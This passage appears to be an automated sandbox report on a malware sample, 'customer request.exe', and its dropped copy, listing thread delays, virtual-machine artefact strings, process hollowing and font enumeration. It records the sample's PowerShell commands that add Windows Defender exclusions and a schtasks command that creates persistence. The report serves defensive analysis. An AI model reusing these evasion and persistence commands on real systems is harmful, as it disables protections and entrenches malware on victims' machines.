            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 596359Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 596250Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 596140Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 596031Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 595915Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 595812Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 595702Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 595583Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 595458Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 595343Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 595234Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 595124Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 595015Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 594906Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 594796Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 594687Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 594578Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 594468Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 594359Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 594250Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 594140Jump to behavior
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 600000
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 599890
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 599780
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 599671
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 599562
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 599453
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 599343
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 599234
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 599123
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 599000
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 598887
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 598778
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 598446
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 598334
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 598203
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 598077
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 597968
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 597859
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 597749
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 597640
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 597531
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 597421
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 597312
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 597202
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 597091
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 596968
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 596859
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 596749
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 596640
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 596531
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 596421
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 596312
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 596203
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 596093
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 595984
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 595874
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 595752
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 595126
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 595000
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 594890
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 594781
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 594671
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 594562
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 594452
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 594343
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 594234
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 594125
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 594015
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 593901
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 593780
            Source: tjvxuavKFXO.exe, 0000000A.00000002.1758134166.0000000001596000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: customer request.exe, 00000000.00000002.1720699808.0000000002EE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: VmcIEFQxvUwHVg8HytX
            Source: customer request.exe, 00000008.00000002.4137608364.0000000002E72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd50e17492f410<
            Source: tjvxuavKFXO.exe, 0000000A.00000002.1758134166.0000000001596000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002F38000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd5109f061e5ee<
            Source: customer request.exe, 00000008.00000002.4134374947.0000000000DB6000.00000004.00000020.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4134788660.0000000000F96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\customer request.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056F7B70 LdrInitializeThunk,8_2_056F7B70
            Source: C:\Users\user\Desktop\customer request.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\customer request.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\customer request.exe"
            Source: C:\Users\user\Desktop\customer request.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe"
            Source: C:\Users\user\Desktop\customer request.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\customer request.exe"Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe"Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeMemory written: C:\Users\user\Desktop\customer request.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\customer request.exe"Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe"Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BAE.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess created: C:\Users\user\Desktop\customer request.exe "C:\Users\user\Desktop\customer request.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp7D04.tmp"
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess created: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe "C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe"
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Users\user\Desktop\customer request.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
